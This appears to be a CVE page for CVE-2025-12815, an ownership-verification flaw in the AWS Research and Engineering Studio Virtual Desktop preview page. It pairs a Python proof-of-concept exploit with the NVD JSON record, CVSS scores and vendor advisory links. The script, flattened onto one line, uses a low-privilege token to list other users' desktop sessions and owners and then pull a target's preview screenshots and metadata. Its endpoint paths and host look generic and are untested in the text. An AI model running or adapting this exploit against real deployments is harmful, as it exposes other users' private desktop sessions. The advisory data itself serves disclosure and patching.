CVE-2025-12815

import requests import json # CVE-2025-12815 PoC - AWS RES Virtual Desktop Preview Page Access Control Bypass # Target: AWS Research and Engineering Studio (RES) Virtual Desktop # Vulnerability: Insufficient ownership verification on Virtual Desktop preview page TARGET_HOST = "https://res.aws.amazon.com" ATTACKER_TOKEN = "<attacker_authentication_token>" TARGET_DESKTOP_ID = "<target_user_desktop_session_id>" def exploit_preview_access(): """ This PoC demonstrates the ownership verification bypass in RES Virtual Desktop preview page. An authenticated low-privilege user can view another user's active desktop session metadata, including periodic desktop preview screenshots. """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Attempt to access target user's desktop preview without proper authorization preview_url = f"{TARGET_HOST}/api/virtual-desktop/preview/{TARGET_DESKTOP_ID}" response = requests.get(preview_url, headers=headers) if response.status_code == 200: data = response.json() print(f"[+] Successfully accessed target desktop preview!") print(f"[+] Preview URL: {data.get('preview_url')}") print(f"[+] Session Metadata: {json.dumps(data.get('metadata'), indent=2)}") return True else: print(f"[-] Access denied or desktop not found. Status: {response.status_code}") return False def enumerate_desktop_sessions(): """ Enumerate accessible desktop sessions to identify valid TARGET_DESKTOP_ID values. """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } list_url = f"{TARGET_HOST}/api/virtual-desktop/sessions" response = requests.get(list_url, headers=headers) if response.status_code == 200: sessions = response.json().get('sessions', []) print(f"[+] Found {len(sessions)} accessible sessions") for session in sessions: print(f" - Session ID: {session.get('id')}, Owner: {session.get('owner')}") return sessions return [] if __name__ == "__main__": print("CVE-2025-12815 PoC - AWS RES Virtual Desktop Preview Access Control Bypass") print("=" * 80) enumerate_desktop_sessions() print() exploit_preview_access()

{"cve": {"id": "CVE-2025-12815", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-11-06T18:15:39.700", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An ownership verification issue in the Virtual Desktop preview page in the Research and Engineering Studio (RES) on AWS before version 2025.09 may allow an authenticated remote user to view another user's active desktop session metadata, including periodical desktop preview screenshots. \n\nTo mitigate this issue, users should upgrade to version 2025.09 or above."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-283"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-026/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/res/releases/tag/2025.09", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/res/security/advisories/GHSA-x3cx-g8g9-75hv", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}